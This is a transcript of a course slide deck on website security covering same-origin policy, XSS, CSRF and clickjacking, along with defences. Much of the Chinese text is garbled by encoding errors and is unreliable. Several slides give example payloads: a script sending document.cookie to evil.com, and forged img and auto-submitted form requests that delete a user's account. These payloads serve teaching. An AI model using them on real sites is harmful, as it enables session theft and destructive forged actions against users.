Selected Topics on Website Security @ 102-2 CCSP

Transcript

1. Selected Topics on Website Security Concept of Same Origin Policy,

   XSS, CSRF & Clickjacking MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全

2. খࢿ҆શ޲લি Concept of Same Origin Policy, XSS, CSRF & Clickjacking

   MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全

3. Same-Origin Policy ಉݯ੓ࡦ

4. ᖣ᧸ث࠷֩৺໵࠷جຊత҆શޭೳʜʜ
   8FC
   ੋݐߏࡏಉݯ੓ࡦతجૅ೭্తɻ – 吳翰清 ❝ ❞

5. Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦੢ ڈ፤ త౦੢

   㑌ݸᖣ᧸ث౎။ɿ

6. Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦੢ ڈ፤ త౦੢

   एᔒ༗ಉݯ੓ࡦɿ

7. Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦੢ ڈ፤ త౦੢

   Upon visiting http://evil.mobile.org : $.get(‘http://facebook.com’, {}, function(data){ // 未經允許就得到你的 Facebook 塗鴉牆 }, ‘html’); एᔒ༗ಉݯ੓ࡦɿ

8. https://developer.mozilla.org/zh-TW/docs/JavaScript/Same_origin_policy_for_JavaScript host, port & protocol Same Origin Different Origin

9. ༬ઃڋ㘺ލ໢Ҭ፤ࢿྉ
   Լྻҝಛྫ

10. ಛྫҰɿՄލ໢Ҭࡌೖࢿݯ೭ඪត • <script> • <img> • <iframe> • <link> •

    Javascript 無從讀寫其內容

11. ಛྫೋɿ$SPTT
    0SJHJO
    3FTPVSDF
    4IBSJOH
    $034 • Origin request header • Access-Control-Allow-XXX response

    header • Enabling cross-origin ajax, web font, WebGL & canvas

12. Cross-Site Scripting (XSS)

13. ࢦ᱆٬ಁաʮ)5.-২ೖʯ篡վྃ໢ทɼᎎೖྃ ዱҙతࢦྩߘɼਐҰ㑊ࡏ࢖༻ऀᖣ᧸໢ท࣌ɼ߇ ੍࢖༻ऀᖣ᧸ثతҰछ߈㐝ɻ – 吳翰清 ❝ ❞

14. <section class="intro"> <%- user.desc %> </section> Your site : Example

    #1 ࢖༻ऀ
    ༌ೖత
    )5.-

15. <section class="intro"> <p>Hello</p> <p>I am Johnson</p> </section> Your site :

    Example #1

16. <section class="intro"> <script type="text/javascript"> $.getJSON('http://evil.com/', { stoken: document.cookie }); </script>

    </section> Your site : Example #1 ፨๚ࠑ༻㖽ท໘తਓɼDPPLJF
    ။ඃ
    FWJMDPN
    䫖૸

17. <script type="text/javascript"> var pageTitle = "<%= userPage.title %>"; </script> Your

    site : Example #2 ࢖༻ऀࣗ༝༌ೖతࣈ۲

18. <script type="text/javascript"> var pageTitle = ""; $.getJSON(...); ""; </script> Your

    site : Example #2 ፨๚ࠑ༻㖽ท໘తਓɼࢿྉ။ඃ䫖૸

19. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3

    ࢖༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!</h1>

20. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3

    ࢖༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!<script>$.getJSON('http://evil.com',...);</script></h1>

21. Ṝछ߈㐝తࣔൣҊྫੋލ໢ҬతɼॴҎڣ
    z$SPTTz
    4JUF
    4DSJQUJOHɻᚙల౸ࠓఱɼੋ൱ލ໢Ҭቮៃෆ ࠶ॏཁɼ944
    Ṝݸ໊ࣈჟҰ௚อཹྃԼိɻ – 吳翰清 ❝ ❞

22. ๷ڔํࣜ 防⽌止 Cookie 盜⽤用：HttpOnly res.cookie('key', 'value', { httpOnly: true });

    ༬ઃଖመबੋ
    USVF

23. ๷ڔํࣜ 防⽌止 Cookie 盜⽤用：HttpOnly res.cookie('key', 'value', { httpOnly: true });

    ༬ઃଖመबੋ
    USVF

24. ๷ڔํࣜ HTML 輸出檢查 — 盡量不⽤用 <%- %> <section class="intro"> <%=

    user.desc %> </section>

25. ๷ڔํࣜ HTML 輸出檢查 — Caja-HTML-Sanitizer // Controller ! var sanitizer

    = require('sanitizer'); sanitizedIntro = sanitizer.sanitize(user.desc); ! <!-- View --> <section class="intro"> <%- sanitizedIntro %> </section> อཹແ֐త
    )5.-
    UBHT

26. ๷ڔํࣜ Javascript 輸出檢查 — ⽤用現成 JSON.stringify <script type="text/javascript"> var page

    = <%- JSON.stringify({ title: userPage.title }) %>; </script>

27. ๷ڔํࣜ DOM-based XSS — 盡量⽤用 .text(…) 取代 .html(…) 或先 sanitize

    想插⼊入的 HTML. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').text(data.userPageTitle); });

28. Cross-Site Request Forgery (CSRF/XSRF)

29. Your site : Example #4 // Delete current user account

    app.get('/user/delete', userCtrl.delete);

30. evil.com : Example #4 <img src="http://yoursite.com/user/delete"> ፨๚ࠑ
    FWJM
    TJUF
    తਓɼ؃౸ྃ વޙ䭪ʗଞࡏ
    ZPVSTJUFDPN
    తாᥒबല໊஍ඃ႟ᎃྃ

31. ߈㐝ऀᷮᷮ༠ಋ࢖༻ऀ଄๚ྃҰݸท໘ɼबҎ֘ ࢖༻ऀత਎෼ɼࡏ
    ZPVSTJUFDPN
    ཫࣥߦྃҰ࣍ૢ ࡞ʜʜṜछ
    SFRVFTU
    ੋ߈㐝ऀॴِ଄తɼॴҎ ڣ
    z$SPTTTJUF
    3FRVFTU
    'PSHFSZzɻ – 吳翰清 ❝ ❞

32. <iframe src="https://mail.google.com/mail/u/0/?logout"> Demo：cryptogasm.com/gmail-logout.html

33. evil.com : Example #5 ፨๚
    FWJM
    TJUF
    ޙɼ࢖༻ऀࡏ
    ZPVSTJUFDPN
    తாᥒबല໊஍ඃ႟ᎃྃ <form action="http://yoursite.com/user/delete" method="post" id="evil-form"> </form>

    ! <script type="text/javascript"> $('#evil-form').submit(); </script>

34. ๷ڔํࣜ • CSRF 攻擊成功的要素：request 的所有參數都可以被 攻擊者猜測到。 • Anti-CSRF Token：使攻擊者無法拼湊正確 request。

35. ๷ڔํࣜ

36. ๷ڔํࣜ

37. ๷ڔํࣜ දᄸૹग़ޙɼޙ୺
    DPOUSPMMFS
    ။ᒾ查දᄸత
    UPLFO
    ੋ൱ᢛ
    DPPLJF
    தత
    UPLFO
    ૬ූɼ
    एෆҰᒬɼबෆ၏ࣄɻ

38. ๷ڔํࣜ http://stackoverflow.com/questions/20420762/how-to-enable-csrf-in-express3 // Express settings ! app.use(express.cookieParser('optional secret string')); app.use(express.session());

    app.use(express.csrf()); app.use(function (req, res, next) { res.locals.csrftoken = req.csrfToken(); next(); }); ! ! ! <!-- View --> ! <form action="..." method="post"> <input type="hidden" name="_csrf" value="<%= csrftoken %>"> </form> ᩋ
    TFTTJPO
    ཫత
    BOUJDTSG
    UPLFO
    ࡏ
    WJFX
    ཫ໵ೳ፤ಘ౸

39. Clickjacking

40. Jeremiah Grossman and Robert Hansen, 2008

41. http://www.crazylearner.org/clickjacking-example/ Copyright 2014 Crazylearner. Fair use

42. None

43. ๷ڔํࣜ w ᩋ㟬త໢᜾ෆඃ࠹ਐ
    JGSBNF
    ཫ
    • x-frame-options: deny w IUUQTHJUIVCDPNFWJMQBDLFUIFMNFU Can’t be

    your site!

44. http://youtu.be/VRCUpXLguHM 吳翰清 著

45. http://youtu.be/VRCUpXLguHM 吳翰清 著